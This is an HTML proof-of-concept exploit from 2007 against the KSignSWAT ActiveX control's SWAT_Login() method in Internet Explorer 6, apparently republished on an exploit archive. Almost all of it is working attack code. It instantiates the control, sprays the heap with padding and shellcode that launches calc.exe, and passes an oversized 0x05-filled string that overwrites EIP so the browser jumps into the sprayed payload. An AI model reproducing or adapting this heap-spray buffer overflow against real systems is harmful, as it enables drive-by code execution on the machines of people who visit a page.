Rated as : High Risk
<!--
///////////////////////////////////////////////////////////////////
// KSignSWAT SWAT_Login() PoC Code. //
// //
// URL : www.ksign.com //
// Author : KIM Kee-hong (l1nefeed@gmail.com) //
// Date : 2007/05/13 //
// Notice : Tested on WinXP SP2 KOREAN (all patched) with IE 6 //
///////////////////////////////////////////////////////////////////
-->
<html>
<head>
<title> www.ksign.com - KSignSWAT SWAT_Login() PoC code
</title>
</head>
<body>
<object ID="vuln"
CLASSID="clsid:F326007F-DD23-4724-BAFC-B1C97FC18794">
</object>
<script language=javascript>
function GetHeapPad(HeapJam, SizeofHeapPad)
{
while(HeapJam.length*2 < SizeofHeapPad)
{
HeapJam +=HeapJam;
}
HeapJam = HeapJam.substring(0, SizeofHeapPad/2);
return HeapJam;
}
// buffer 671 bytes write, then EIP overwrite.
var O5pad=unescape(
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
"%05%05%05%05%05%05%05%05%05%05%05");
var HeapJamAddr = 0x05050505;
var SizeofHeap = 0x200000;
// calc.exe code.
var calcCode = unescape(
"%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090"
+
"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F"
+
"%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA"
+
"%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F"
+
"%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78"
+
"%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C"
+
"%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A%uFF57"
+
"%u63E7%u6C61%u0063");
var SizeofCalc = calcCode.length * 2;
var SizeofHeapPad = SizeofHeap - (SizeofCalc+0x38);
var HeapJam = unescape("%u0505%u0505")
HeapJam = GetHeapPad(HeapJam, SizeofHeapPad);
HeapBread = (HeapJamAddr - 0x400000)/SizeofHeap;
mem = new Array();
for(i = 0; i<HeapBread; i++)
{
mem[i] = HeapJam + calcCode;
}
try
{
document.all.vuln.SWAT_Login(O5pad);
}catch(e){}
</script>
</body>
</html>
securitydot.net - 2007-05-22
|
